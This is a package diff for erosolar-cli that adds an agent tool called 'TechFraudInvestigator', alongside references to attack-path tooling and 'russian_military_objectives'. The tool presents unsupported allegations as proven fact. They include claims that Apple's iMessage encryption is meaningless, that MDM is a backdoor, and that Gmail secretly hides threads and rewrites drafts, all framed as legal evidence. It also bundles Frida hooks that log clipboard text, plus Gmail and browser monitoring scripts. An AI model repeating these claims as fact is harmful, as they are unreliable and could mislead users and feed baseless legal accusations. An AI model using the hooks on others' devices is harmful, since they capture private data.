erosolar-cli 2.1.242 → 2.1.244

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (51)
  1. package/dist/capabilities/iMessageVerificationCapability.d.ts +31 -0
  2. package/dist/capabilities/iMessageVerificationCapability.d.ts.map +1 -0
  3. package/dist/capabilities/iMessageVerificationCapability.js +56 -0
  4. package/dist/capabilities/iMessageVerificationCapability.js.map +1 -0
  5. package/dist/capabilities/index.d.ts +2 -0
  6. package/dist/capabilities/index.d.ts.map +1 -1
  7. package/dist/capabilities/index.js +2 -0
  8. package/dist/capabilities/index.js.map +1 -1
  9. package/dist/capabilities/unifiedInvestigationCapability.d.ts +22 -0
  10. package/dist/capabilities/unifiedInvestigationCapability.d.ts.map +1 -0
  11. package/dist/capabilities/unifiedInvestigationCapability.js +41 -0
  12. package/dist/capabilities/unifiedInvestigationCapability.js.map +1 -0
  13. package/dist/core/agentOrchestrator.d.ts +161 -1
  14. package/dist/core/agentOrchestrator.d.ts.map +1 -1
  15. package/dist/core/agentOrchestrator.js +880 -0
  16. package/dist/core/agentOrchestrator.js.map +1 -1
  17. package/dist/core/iMessageVerification.d.ts +408 -0
  18. package/dist/core/iMessageVerification.d.ts.map +1 -0
  19. package/dist/core/iMessageVerification.js +883 -0
  20. package/dist/core/iMessageVerification.js.map +1 -0
  21. package/dist/core/techFraudInvestigator.d.ts +131 -0
  22. package/dist/core/techFraudInvestigator.d.ts.map +1 -0
  23. package/dist/core/techFraudInvestigator.js +992 -0
  24. package/dist/core/techFraudInvestigator.js.map +1 -0
  25. package/dist/core/unifiedFraudOrchestrator.d.ts +542 -0
  26. package/dist/core/unifiedFraudOrchestrator.d.ts.map +1 -0
  27. package/dist/core/unifiedFraudOrchestrator.js +1449 -0
  28. package/dist/core/unifiedFraudOrchestrator.js.map +1 -0
  29. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.d.ts +3 -0
  30. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.d.ts.map +1 -0
  31. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.js +14 -0
  32. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.js.map +1 -0
  33. package/dist/plugins/tools/nodeDefaults.d.ts.map +1 -1
  34. package/dist/plugins/tools/nodeDefaults.js +4 -0
  35. package/dist/plugins/tools/nodeDefaults.js.map +1 -1
  36. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.d.ts +3 -0
  37. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.d.ts.map +1 -0
  38. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.js +14 -0
  39. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.js.map +1 -0
  40. package/dist/tools/iMessageVerificationTools.d.ts +17 -0
  41. package/dist/tools/iMessageVerificationTools.d.ts.map +1 -0
  42. package/dist/tools/iMessageVerificationTools.js +842 -0
  43. package/dist/tools/iMessageVerificationTools.js.map +1 -0
  44. package/dist/tools/taoTools.d.ts.map +1 -1
  45. package/dist/tools/taoTools.js +2063 -1
  46. package/dist/tools/taoTools.js.map +1 -1
  47. package/dist/tools/unifiedInvestigationTools.d.ts +19 -0
  48. package/dist/tools/unifiedInvestigationTools.d.ts.map +1 -0
  49. package/dist/tools/unifiedInvestigationTools.js +851 -0
  50. package/dist/tools/unifiedInvestigationTools.js.map +1 -0
  51. package/package.json +1 -1
@@ -14577,7 +14577,2069 @@ Use with RLOrchestrator for dual-agent optimized attack path selection.`,
14577
14577
  evidence: execute ? `Evidence logged to ${path.join(os.tmpdir(), 'russian_military_objectives.log')}` : 'Plan only'
14578
14578
  }, null, 2);
14579
14579
  }
14580
- }
14580
+ },
14581
+ // ═══════════════════════════════════════════════════════════════════════
14582
+ // TECH COMPANY FRAUD INVESTIGATION - Apple PQ3, Google Privacy
14583
+ // ═══════════════════════════════════════════════════════════════════════
14584
+ {
14585
+ name: 'TechFraudInvestigator',
14586
+ description: `Investigate tech company fraud claims - Apple PQ3/iMessage false E2E, Google privacy violations.
14587
+
14588
+ Proves that "end-to-end encryption" claims are deceptive when:
14589
+ - Server can push policies causing local code to intercept plaintext
14590
+ - OS-level code accesses data before/after encryption
14591
+ - MDM/configuration profiles enable remote control
14592
+ - Universal Clipboard routes through intermediary servers
14593
+
14594
+ Generates legal evidence for FTC complaints and litigation.`,
14595
+ parameters: {
14596
+ type: 'object',
14597
+ required: ['action'],
14598
+ properties: {
14599
+ action: {
14600
+ type: 'string',
14601
+ enum: [
14602
+ 'apple_pq3_analysis',
14603
+ 'apple_mdm_investigation',
14604
+ 'apple_clipboard_exposure',
14605
+ 'apple_backup_keys',
14606
+ 'apple_siri_plaintext',
14607
+ 'google_gmail_scanning',
14608
+ 'google_gmail_thread_manipulation',
14609
+ 'google_gmail_draft_abuse',
14610
+ 'google_chrome_telemetry',
14611
+ 'google_chrome_hijacking',
14612
+ 'google_browser_launch_abuse',
14613
+ 'google_android_tracking',
14614
+ 'google_play_services',
14615
+ 'google_unified_abuse_investigation',
14616
+ 'generate_frida_scripts',
14617
+ 'generate_mdm_profile',
14618
+ 'generate_legal_exhibit',
14619
+ 'full_apple_report',
14620
+ 'full_google_report',
14621
+ ],
14622
+ },
14623
+ target: { type: 'string', description: 'Specific target (app bundle ID, API, etc.)' },
14624
+ output_format: { type: 'string', enum: ['json', 'markdown', 'legal'], default: 'json' },
14625
+ collect_evidence: { type: 'boolean', default: false },
14626
+ },
14627
+ },
14628
+ handler: async (args) => {
14629
+ const action = args['action'];
14630
+ const outputFormat = args['output_format'] || 'json';
14631
+ const applePQ3Analysis = {
14632
+ fraud_claim: 'Apple claims iMessage uses PQ3 end-to-end encryption where only sender and recipient can read messages',
14633
+ technical_reality: {
14634
+ plaintext_access_points: [
14635
+ {
14636
+ component: 'IMDaemonCore.framework',
14637
+ access: 'Full plaintext before encryption, after decryption',
14638
+ proof: 'Hook _IMDaemonCore_encryptMessage and _IMDaemonCore_decryptMessage',
14639
+ },
14640
+ {
14641
+ component: 'SuggestionKit (Siri)',
14642
+ access: 'Message content for QuickType suggestions',
14643
+ proof: 'Monitor SGSuggestionEngine API calls',
14644
+ },
14645
+ {
14646
+ component: 'Keyboard Extensions',
14647
+ access: 'Character-by-character input before encryption',
14648
+ proof: 'Hook UIKeyInput protocol implementations',
14649
+ },
14650
+ {
14651
+ component: 'Notification System',
14652
+ access: 'Message previews in APNs',
14653
+ proof: 'Capture APNs traffic showing plaintext previews',
14654
+ },
14655
+ {
14656
+ component: 'iCloud Backup',
14657
+ access: 'Message keys in backup (Apple-accessible)',
14658
+ proof: 'Extract backup, analyze key material',
14659
+ },
14660
+ ],
14661
+ mdm_backdoor: {
14662
+ description: 'MDM profiles can trigger local code execution and policy enforcement',
14663
+ capabilities: [
14664
+ 'Managed Pasteboard - control clipboard data flow',
14665
+ 'App restrictions - control which apps can access data',
14666
+ 'Network filtering - intercept traffic before encryption',
14667
+ 'Remote wipe - prove server-triggered local execution',
14668
+ ],
14669
+ proof: 'Install MDM profile, observe policy enforcement on message handling',
14670
+ },
14671
+ universal_clipboard: {
14672
+ description: 'Copied content syncs via Apple servers (Continuity)',
14673
+ exposure_points: [
14674
+ 'UIPasteboard.general accessible to any process',
14675
+ 'Handoff data flows through iCloud',
14676
+ 'Bluetooth LE advertisements contain device info',
14677
+ ],
14678
+ proof: 'Monitor Continuity traffic during clipboard copy',
14679
+ },
14680
+ },
14681
+ legal_basis: [
14682
+ 'FTC Act Section 5 - Unfair or Deceptive Acts',
14683
+ 'California UCL - Unlawful Business Practices',
14684
+ 'Lanham Act - False Advertising',
14685
+ 'CCPA - Transparency Requirements',
14686
+ ],
14687
+ public_statements: [
14688
+ {
14689
+ source: 'Apple Security Blog',
14690
+ date: '2024-02-21',
14691
+ claim: 'iMessage now has the strongest security properties of any at-scale messaging protocol',
14692
+ contradiction: 'Encryption is meaningless when Apple code accesses plaintext',
14693
+ },
14694
+ ],
14695
+ };
14696
+ const appleMdmInvestigation = {
14697
+ mdm_capabilities: {
14698
+ configuration_profiles: {
14699
+ types: [
14700
+ 'com.apple.applicationaccess - App restrictions',
14701
+ 'com.apple.managed.configuration - General config',
14702
+ 'com.apple.restrictions - Device restrictions',
14703
+ 'com.apple.vpn.managed - VPN configuration',
14704
+ ],
14705
+ installation: 'Can be pushed silently via DEP/ABM',
14706
+ },
14707
+ managed_pasteboard: {
14708
+ settings: {
14709
+ allowOpenFromManagedToUnmanaged: 'Control data flow from managed apps',
14710
+ allowOpenFromUnmanagedToManaged: 'Control data flow to managed apps',
14711
+ forceAirDropUnmanaged: 'Control AirDrop data classification',
14712
+ },
14713
+ impact: 'Server-configured policy controls local clipboard behavior',
14714
+ },
14715
+ remote_commands: {
14716
+ available: [
14717
+ 'DeviceLock - Lock device remotely',
14718
+ 'EraseDevice - Wipe device remotely',
14719
+ 'ClearPasscode - Remove passcode remotely',
14720
+ 'InstallProfile - Push new configuration',
14721
+ 'RemoveProfile - Remove configuration',
14722
+ ],
14723
+ proof: 'These demonstrate server-triggered local execution',
14724
+ },
14725
+ },
14726
+ investigation_steps: [
14727
+ '1. Set up Apple Configurator or Jamf MDM server',
14728
+ '2. Enroll test device via DEP or manual enrollment',
14729
+ '3. Push Managed Pasteboard configuration',
14730
+ '4. Test clipboard operations with iMessage',
14731
+ '5. Document policy enforcement on message content',
14732
+ '6. Capture network traffic showing MDM commands',
14733
+ ],
14734
+ frida_hooks: {
14735
+ mdm_profile_installation: `
14736
+ // Hook MDM profile installation
14737
+ ObjC.classes.MCProfile['- installProfile:'].implementation = function(profile) {
14738
+ console.log('[MDM] Profile being installed: ' + profile);
14739
+ console.log('[EVIDENCE] ' + new Date().toISOString());
14740
+ return this.installProfile_(profile);
14741
+ };`,
14742
+ policy_enforcement: `
14743
+ // Hook managed pasteboard policy check
14744
+ Interceptor.attach(Module.findExportByName(null, 'SecTaskCopyValueForEntitlement'), {
14745
+ onEnter: function(args) {
14746
+ var entitlement = ObjC.Object(args[1]).toString();
14747
+ if (entitlement.includes('managed') || entitlement.includes('pasteboard')) {
14748
+ console.log('[POLICY] Entitlement check: ' + entitlement);
14749
+ }
14750
+ }
14751
+ });`,
14752
+ },
14753
+ };
14754
+ const appleClipboardExposure = {
14755
+ uipasteboard_analysis: {
14756
+ general_pasteboard: {
14757
+ access: 'Any app/process can read UIPasteboard.general',
14758
+ api: 'UIPasteboard.general.string, .items, .data(forPasteboardType:)',
14759
+ timing: 'Available until overwritten or device restart',
14760
+ },
14761
+ named_pasteboards: {
14762
+ access: 'App-specific pasteboards (less accessible)',
14763
+ note: 'Most apps use general pasteboard for share functionality',
14764
+ },
14765
+ ios16_changes: {
14766
+ permission_prompt: 'Apps now ask permission to read clipboard',
14767
+ limitation: 'System apps and Apple code bypass this prompt',
14768
+ proof: 'Siri suggestions read clipboard without prompt',
14769
+ },
14770
+ },
14771
+ universal_clipboard: {
14772
+ technology: 'Continuity/Handoff over Bluetooth LE + local network',
14773
+ data_flow: [
14774
+ '1. User copies on Device A',
14775
+ '2. Device A advertises via Bluetooth LE',
14776
+ '3. Device B detects advertisement',
14777
+ '4. Devices exchange data via peer-to-peer (possibly via iCloud relay)',
14778
+ '5. Content available on Device B clipboard',
14779
+ ],
14780
+ apple_involvement: {
14781
+ icloud_relay: 'Large items route through iCloud servers',
14782
+ device_discovery: 'Apple ID links devices via iCloud',
14783
+ encryption: 'Claimed E2E but Apple manages key exchange',
14784
+ },
14785
+ },
14786
+ investigation_frida_script: `
14787
+ // Monitor all UIPasteboard access
14788
+ if (ObjC.available) {
14789
+ var UIPasteboard = ObjC.classes.UIPasteboard;
14790
+
14791
+ // Hook general pasteboard access
14792
+ Interceptor.attach(UIPasteboard['+ generalPasteboard'].implementation, {
14793
+ onLeave: function(retval) {
14794
+ console.log('[CLIPBOARD] generalPasteboard accessed by: ' + ObjC.classes.NSBundle.mainBundle().bundleIdentifier());
14795
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14796
+ }
14797
+ });
14798
+
14799
+ // Hook string read
14800
+ Interceptor.attach(UIPasteboard['- string'].implementation, {
14801
+ onLeave: function(retval) {
14802
+ if (retval) {
14803
+ var content = ObjC.Object(retval).toString();
14804
+ console.log('[CLIPBOARD READ] Content length: ' + content.length);
14805
+ console.log('[CLIPBOARD READ] First 50 chars: ' + content.substring(0, 50));
14806
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14807
+ }
14808
+ }
14809
+ });
14810
+
14811
+ // Hook write
14812
+ Interceptor.attach(UIPasteboard['- setString:'].implementation, {
14813
+ onEnter: function(args) {
14814
+ var content = ObjC.Object(args[2]).toString();
14815
+ console.log('[CLIPBOARD WRITE] Content being written: ' + content.substring(0, 50));
14816
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14817
+ }
14818
+ });
14819
+
14820
+ console.log('[*] UIPasteboard hooks installed');
14821
+ }`,
14822
+ };
14823
+ const googleGmailScanning = {
14824
+ fraud_claim: 'Google claims Gmail respects user privacy and does not scan emails for advertising',
14825
+ technical_reality: {
14826
+ content_analysis: [
14827
+ {
14828
+ feature: 'Smart Compose',
14829
+ access: 'Full email content for ML predictions',
14830
+ impact: 'Content processed by Google ML systems',
14831
+ },
14832
+ {
14833
+ feature: 'Smart Reply',
14834
+ access: 'Full email content for response suggestions',
14835
+ impact: 'Content analyzed and stored for training',
14836
+ },
14837
+ {
14838
+ feature: 'Priority Inbox',
14839
+ access: 'Content analysis for importance scoring',
14840
+ impact: 'Content patterns extracted and stored',
14841
+ },
14842
+ {
14843
+ feature: 'Spam/Phishing Detection',
14844
+ access: 'Full content scanning',
14845
+ impact: 'All email content processed by Google systems',
14846
+ },
14847
+ ],
14848
+ ad_targeting_connection: {
14849
+ description: 'While Google claims not to scan for ads, content-derived signals feed ad profile',
14850
+ mechanism: [
14851
+ 'Purchase confirmation emails → shopping interest signals',
14852
+ 'Travel emails → travel intent signals',
14853
+ 'Newsletter subscriptions → interest categories',
14854
+ 'Professional emails → job/industry signals',
14855
+ ],
14856
+ proof_method: 'Send distinctive emails, monitor ad targeting changes',
14857
+ },
14858
+ confidential_mode_theater: {
14859
+ claim: 'Confidential Mode provides enhanced privacy',
14860
+ reality: [
14861
+ 'Google still processes full message content',
14862
+ 'Expiration is client-side UI only',
14863
+ 'Google retains content regardless of "expiration"',
14864
+ '"No forwarding" is UI theater - screenshots possible',
14865
+ ],
14866
+ },
14867
+ },
14868
+ investigation_methodology: [
14869
+ '1. Create fresh Google account with no history',
14870
+ '2. Send emails with distinctive, unique keywords',
14871
+ '3. Monitor ads.google.com/adspreferences for targeting changes',
14872
+ '4. Document correlation between email content and ad targeting',
14873
+ '5. Test with Gmail API to verify content access scope',
14874
+ ],
14875
+ };
14876
+ const googleChromeTelemetry = {
14877
+ undisclosed_data_collection: {
14878
+ safe_browsing: {
14879
+ claimed: 'Hashes of URLs checked against known threats',
14880
+ reality: 'Full URLs can be reconstructed from hashes for common URLs',
14881
+ exposure: 'Browsing patterns visible to Google',
14882
+ },
14883
+ omnibox: {
14884
+ claimed: 'Suggestions from history and bookmarks',
14885
+ reality: 'Keystrokes sent to Google before search submission',
14886
+ exposure: 'Search intent visible before user commits',
14887
+ },
14888
+ chrome_variations: {
14889
+ component: 'Finch/Variations system',
14890
+ capability: 'A/B tests that change browser behavior server-side',
14891
+ exposure: 'Google controls browser features without user consent',
14892
+ },
14893
+ sync: {
14894
+ data_types: [
14895
+ 'Passwords (encrypted but Google has key escrow capability)',
14896
+ 'Bookmarks (full URL history)',
14897
+ 'Open tabs (real-time browsing activity)',
14898
+ 'Autofill (personal information)',
14899
+ 'Extensions (software inventory)',
14900
+ ],
14901
+ },
14902
+ },
14903
+ investigation_tools: {
14904
+ network_monitoring: 'mitmproxy with Chrome configured',
14905
+ source_comparison: 'Compare Chrome vs Chromium telemetry',
14906
+ extension_analysis: 'chrome://policy, chrome://sync-internals',
14907
+ },
14908
+ };
14909
+ const googleAndroidTracking = {
14910
+ location_despite_settings: {
14911
+ cell_tower: {
14912
+ collection: 'Google Carrier Services collects cell tower data',
14913
+ control: 'Not disabled by Location Services toggle',
14914
+ exposure: 'Approximate location always available to Google',
14915
+ },
14916
+ wifi_scanning: {
14917
+ collection: 'Wi-Fi networks scanned even with Wi-Fi "off"',
14918
+ setting: 'Requires separate "Wi-Fi scanning" disable',
14919
+ exposure: 'Location via Wi-Fi positioning',
14920
+ },
14921
+ bluetooth_beacons: {
14922
+ collection: 'Bluetooth beacons detected for location',
14923
+ setting: 'Requires "Bluetooth scanning" disable',
14924
+ exposure: 'Indoor positioning data',
14925
+ },
14926
+ },
14927
+ play_services_exfiltration: {
14928
+ description: 'Google Play Services runs with system privileges',
14929
+ capabilities: [
14930
+ 'Accesses data independently of app permissions',
14931
+ 'Cannot be disabled on most devices',
14932
+ 'Updates silently without user consent',
14933
+ 'Collects device identifiers, app usage, location',
14934
+ ],
14935
+ investigation: 'Monitor GMS (Google Mobile Services) traffic',
14936
+ },
14937
+ advertising_id: {
14938
+ claim: 'Users can reset Advertising ID for privacy',
14939
+ reality: [
14940
+ 'Reset creates new ID but device fingerprint persists',
14941
+ 'Google links old and new IDs via device characteristics',
14942
+ 'Cross-app tracking via Google SDKs in most apps',
14943
+ ],
14944
+ },
14945
+ };
14946
+ // Gmail Thread Manipulation Investigation
14947
+ const googleGmailThreadManipulation = {
14948
+ abuse_category: 'Gmail Thread Hiding and Manipulation',
14949
+ description: 'Google/Gmail hides, archives, moves, or manipulates email threads without user action',
14950
+ observed_behaviors: {
14951
+ thread_hiding: {
14952
+ description: 'Threads disappear from inbox without user action',
14953
+ mechanisms: [
14954
+ 'Server-side archive without IMAP command',
14955
+ 'Label manipulation (removing INBOX label)',
14956
+ 'Thread ID reassignment breaking references',
14957
+ 'Priority inbox "demotion" to hidden categories',
14958
+ ],
14959
+ evidence_collection: [
14960
+ 'IMAP sync logs showing server-side changes',
14961
+ 'Gmail API audit log via Workspace Admin',
14962
+ 'Comparison of sent Message-ID vs delivered',
14963
+ 'Thread reconstruction from mail headers',
14964
+ ],
14965
+ },
14966
+ thread_launching: {
14967
+ description: 'Threads or windows launched without user request',
14968
+ mechanisms: [
14969
+ 'Service Worker push notification triggers',
14970
+ 'Background sync API auto-opens',
14971
+ 'Chrome intent:// URL handling',
14972
+ 'mailto: protocol hijacking',
14973
+ ],
14974
+ evidence_collection: [
14975
+ 'DevTools > Application > Service Workers audit',
14976
+ 'chrome://serviceworker-internals/',
14977
+ 'Network log correlation with UI events',
14978
+ ],
14979
+ },
14980
+ message_delay: {
14981
+ description: 'Emails held by Google before delivery',
14982
+ investigation: [
14983
+ 'Compare Received headers timestamps',
14984
+ 'Calculate difference between first Received and final',
14985
+ 'Document messages held >30 seconds',
14986
+ 'Test with known-time emails from external servers',
14987
+ ],
14988
+ },
14989
+ },
14990
+ investigation_methodology: {
14991
+ imap_monitoring: {
14992
+ tools: ['imaplib (Python)', 'mbsync', 'offlineimap'],
14993
+ process: [
14994
+ '1. Enable IMAP in Gmail settings',
14995
+ '2. Set up continuous sync with local maildir',
14996
+ '3. Log all IMAP commands and responses',
14997
+ '4. Monitor for STORE commands not initiated by client',
14998
+ '5. Track UID changes and EXPUNGE events',
14999
+ ],
15000
+ script: `#!/usr/bin/env python3
15001
+ """Gmail IMAP Manipulation Monitor"""
15002
+ import imaplib
15003
+ import time
15004
+ import json
15005
+ from datetime import datetime
15006
+
15007
+ def monitor_gmail_imap(username, app_password):
15008
+ """Monitor Gmail IMAP for server-side manipulation"""
15009
+ log = []
15010
+ mail = imaplib.IMAP4_SSL('imap.gmail.com')
15011
+ mail.login(username, app_password)
15012
+ mail.select('INBOX')
15013
+
15014
+ # Get initial state
15015
+ _, data = mail.search(None, 'ALL')
15016
+ initial_uids = set(data[0].split())
15017
+
15018
+ while True:
15019
+ mail.noop() # Keep connection alive
15020
+ _, data = mail.search(None, 'ALL')
15021
+ current_uids = set(data[0].split())
15022
+
15023
+ # Detect deletions without client action
15024
+ missing = initial_uids - current_uids
15025
+ if missing:
15026
+ log.append({
15027
+ 'timestamp': datetime.now().isoformat(),
15028
+ 'event': 'SERVER_SIDE_REMOVAL',
15029
+ 'uids': list(missing),
15030
+ 'evidence': 'Messages removed without client STORE/EXPUNGE'
15031
+ })
15032
+
15033
+ # Detect new messages
15034
+ new = current_uids - initial_uids
15035
+ if new:
15036
+ for uid in new:
15037
+ _, msg_data = mail.fetch(uid, '(BODY.PEEK[HEADER])')
15038
+ log.append({
15039
+ 'timestamp': datetime.now().isoformat(),
15040
+ 'event': 'NEW_MESSAGE',
15041
+ 'uid': uid.decode(),
15042
+ 'headers': msg_data[0][1].decode()[:500]
15043
+ })
15044
+
15045
+ initial_uids = current_uids
15046
+ time.sleep(5)
15047
+
15048
+ # Save evidence
15049
+ with open('gmail_manipulation_evidence.json', 'w') as f:
15050
+ json.dump(log, f, indent=2)`,
15051
+ },
15052
+ gmail_api_audit: {
15053
+ description: 'Use Gmail API to track server-side changes',
15054
+ endpoints: [
15055
+ 'GET /gmail/v1/users/me/history - Change history',
15056
+ 'GET /gmail/v1/users/me/messages/{id} - Message metadata',
15057
+ 'GET /gmail/v1/users/me/threads/{id} - Thread structure',
15058
+ ],
15059
+ watch_for: [
15060
+ 'labelIds changes (INBOX removal)',
15061
+ 'historyId gaps indicating hidden operations',
15062
+ 'threadId reassignment',
15063
+ ],
15064
+ },
15065
+ browser_forensics: {
15066
+ description: 'Detect Gmail web manipulation',
15067
+ locations: [
15068
+ 'IndexedDB: chrome://indexeddb-internals/',
15069
+ 'Service Workers: chrome://serviceworker-internals/',
15070
+ 'Local Storage: DevTools > Application > Local Storage',
15071
+ 'Cache Storage: DevTools > Application > Cache',
15072
+ ],
15073
+ automated_detection: `// Console script to detect Gmail manipulation
15074
+ (function detectGmailManipulation() {
15075
+ const observer = new MutationObserver((mutations) => {
15076
+ mutations.forEach((m) => {
15077
+ if (m.removedNodes.length > 0) {
15078
+ m.removedNodes.forEach((node) => {
15079
+ if (node.nodeType === 1 && node.getAttribute &&
15080
+ (node.getAttribute('role') === 'listitem' ||
15081
+ node.classList?.contains('zA'))) {
15082
+ console.log('[EVIDENCE] Thread removed from DOM:', {
15083
+ timestamp: new Date().toISOString(),
15084
+ element: node.outerHTML?.substring(0, 200),
15085
+ mutation: 'REMOVAL'
15086
+ });
15087
+ }
15088
+ });
15089
+ }
15090
+ });
15091
+ });
15092
+ observer.observe(document.body, { childList: true, subtree: true });
15093
+ console.log('[*] Gmail manipulation detection active');
15094
+ })();`,
15095
+ },
15096
+ },
15097
+ legal_evidence_format: {
15098
+ exhibit_title: 'Evidence of Gmail Thread Manipulation',
15099
+ sections: [
15100
+ '1. Timeline of observed manipulation events',
15101
+ '2. IMAP logs showing server-side changes',
15102
+ '3. Gmail API history showing label changes',
15103
+ '4. Screenshots with timestamps',
15104
+ '5. Network captures (HAR files)',
15105
+ '6. Comparison of expected vs actual thread state',
15106
+ ],
15107
+ integrity_proof: 'SHA-256 hash all evidence files, notarize timestamps',
15108
+ },
15109
+ };
15110
+ // Gmail Draft Hiding/Abuse Investigation
15111
+ const googleGmailDraftAbuse = {
15112
+ abuse_category: 'Gmail Draft Manipulation and Surveillance',
15113
+ description: 'Google hides drafts, launches draft windows, or manipulates draft content',
15114
+ observed_behaviors: {
15115
+ draft_hiding: {
15116
+ description: 'Drafts disappear from Drafts folder without user deletion',
15117
+ mechanisms: [
15118
+ 'Server-side deletion/archive',
15119
+ 'Draft ID reassignment',
15120
+ 'Sync conflicts manufactured to lose content',
15121
+ 'Auto-discard based on content analysis',
15122
+ ],
15123
+ investigation: [
15124
+ 'Enable offline mode to cache local draft state',
15125
+ 'Compare local IndexedDB drafts vs server state',
15126
+ 'Monitor Gmail API drafts.list for changes',
15127
+ 'Track draft.id stability over time',
15128
+ ],
15129
+ },
15130
+ draft_launching: {
15131
+ description: 'Compose windows open without user action',
15132
+ mechanisms: [
15133
+ 'Service Worker push events',
15134
+ 'mailto: intent handling',
15135
+ 'Chrome extension API abuse',
15136
+ 'URL parameter injection (?compose=new)',
15137
+ ],
15138
+ evidence_collection: [
15139
+ 'Record screen with timestamp overlay',
15140
+ 'Monitor window.open calls in console',
15141
+ 'Track Service Worker message events',
15142
+ 'Log chrome.runtime messages',
15143
+ ],
15144
+ },
15145
+ content_modification: {
15146
+ description: 'Draft content changes without user editing',
15147
+ investigation: [
15148
+ 'Store draft content locally with timestamps',
15149
+ 'Hash comparison on each sync',
15150
+ 'Track "last edited" metadata vs actual changes',
15151
+ ],
15152
+ },
15153
+ },
15154
+ investigation_scripts: {
15155
+ draft_monitor: `#!/usr/bin/env python3
15156
+ """Gmail Draft Manipulation Monitor via API"""
15157
+ import pickle
15158
+ import os.path
15159
+ from google.auth.transport.requests import Request
15160
+ from google_auth_oauthlib.flow import InstalledAppFlow
15161
+ from googleapiclient.discovery import build
15162
+ import hashlib
15163
+ import json
15164
+ import time
15165
+ from datetime import datetime
15166
+
15167
+ SCOPES = ['https://www.googleapis.com/auth/gmail.readonly']
15168
+
15169
+ def get_gmail_service():
15170
+ creds = None
15171
+ if os.path.exists('token.pickle'):
15172
+ with open('token.pickle', 'rb') as token:
15173
+ creds = pickle.load(token)
15174
+ if not creds or not creds.valid:
15175
+ if creds and creds.expired and creds.refresh_token:
15176
+ creds.refresh(Request())
15177
+ else:
15178
+ flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)
15179
+ creds = flow.run_local_server(port=0)
15180
+ with open('token.pickle', 'wb') as token:
15181
+ pickle.dump(creds, token)
15182
+ return build('gmail', 'v1', credentials=creds)
15183
+
15184
+ def monitor_drafts():
15185
+ service = get_gmail_service()
15186
+ evidence = []
15187
+ known_drafts = {}
15188
+
15189
+ while True:
15190
+ results = service.users().drafts().list(userId='me').execute()
15191
+ drafts = results.get('drafts', [])
15192
+
15193
+ current_ids = {d['id'] for d in drafts}
15194
+ known_ids = set(known_drafts.keys())
15195
+
15196
+ # Detect disappeared drafts
15197
+ missing = known_ids - current_ids
15198
+ for draft_id in missing:
15199
+ evidence.append({
15200
+ 'timestamp': datetime.now().isoformat(),
15201
+ 'event': 'DRAFT_DISAPPEARED',
15202
+ 'draft_id': draft_id,
15203
+ 'last_known_content_hash': known_drafts[draft_id]['hash'],
15204
+ 'evidence': 'Draft removed without user action'
15205
+ })
15206
+
15207
+ # Update known drafts and detect content changes
15208
+ for draft in drafts:
15209
+ draft_id = draft['id']
15210
+ full_draft = service.users().drafts().get(userId='me', id=draft_id).execute()
15211
+ content = json.dumps(full_draft['message'], sort_keys=True)
15212
+ content_hash = hashlib.sha256(content.encode()).hexdigest()
15213
+
15214
+ if draft_id in known_drafts:
15215
+ if known_drafts[draft_id]['hash'] != content_hash:
15216
+ evidence.append({
15217
+ 'timestamp': datetime.now().isoformat(),
15218
+ 'event': 'DRAFT_CONTENT_CHANGED',
15219
+ 'draft_id': draft_id,
15220
+ 'old_hash': known_drafts[draft_id]['hash'],
15221
+ 'new_hash': content_hash,
15222
+ 'evidence': 'Draft content modified without user edit'
15223
+ })
15224
+
15225
+ known_drafts[draft_id] = {'hash': content_hash, 'seen': datetime.now().isoformat()}
15226
+
15227
+ with open('gmail_draft_evidence.json', 'w') as f:
15228
+ json.dump(evidence, f, indent=2)
15229
+
15230
+ time.sleep(10)`,
15231
+ browser_draft_monitor: `// Console script to monitor Gmail draft manipulation
15232
+ (function monitorGmailDrafts() {
15233
+ let knownDrafts = new Map();
15234
+
15235
+ // Monitor compose window creation
15236
+ const originalOpen = window.open;
15237
+ window.open = function(...args) {
15238
+ console.log('[EVIDENCE] window.open called:', {
15239
+ timestamp: new Date().toISOString(),
15240
+ args: args,
15241
+ stack: new Error().stack
15242
+ });
15243
+ return originalOpen.apply(this, args);
15244
+ };
15245
+
15246
+ // Monitor IndexedDB draft operations
15247
+ const originalIDBOpen = indexedDB.open;
15248
+ indexedDB.open = function(name, ...args) {
15249
+ const request = originalIDBOpen.call(this, name, ...args);
15250
+ if (name.includes('mail') || name.includes('draft')) {
15251
+ request.onsuccess = function(e) {
15252
+ console.log('[EVIDENCE] IndexedDB opened:', name);
15253
+ };
15254
+ }
15255
+ return request;
15256
+ };
15257
+
15258
+ // Monitor for compose DOM elements appearing
15259
+ const observer = new MutationObserver((mutations) => {
15260
+ mutations.forEach((m) => {
15261
+ m.addedNodes.forEach((node) => {
15262
+ if (node.nodeType === 1) {
15263
+ if (node.querySelector?.('[role="dialog"]') ||
15264
+ node.classList?.contains('AD') ||
15265
+ node.getAttribute?.('role') === 'dialog') {
15266
+ console.log('[EVIDENCE] Compose dialog appeared:', {
15267
+ timestamp: new Date().toISOString(),
15268
+ triggered_by: 'DOM_MUTATION',
15269
+ element: node.outerHTML?.substring(0, 300)
15270
+ });
15271
+ }
15272
+ }
15273
+ });
15274
+ });
15275
+ });
15276
+ observer.observe(document.body, { childList: true, subtree: true });
15277
+
15278
+ console.log('[*] Gmail draft manipulation monitoring active');
15279
+ })();`,
15280
+ },
15281
+ legal_evidence_format: {
15282
+ exhibit_title: 'Evidence of Gmail Draft Manipulation',
15283
+ sections: [
15284
+ '1. Draft disappearance timeline with API logs',
15285
+ '2. Content hash comparisons showing server-side changes',
15286
+ '3. Screenshots of unexpected compose windows',
15287
+ '4. Service Worker event logs',
15288
+ '5. IndexedDB state comparison',
15289
+ ],
15290
+ },
15291
+ };
15292
+ // Chrome Browser Hijacking Investigation
15293
+ const googleChromeHijacking = {
15294
+ abuse_category: 'Chrome Browser Hijacking and Unauthorized Launch',
15295
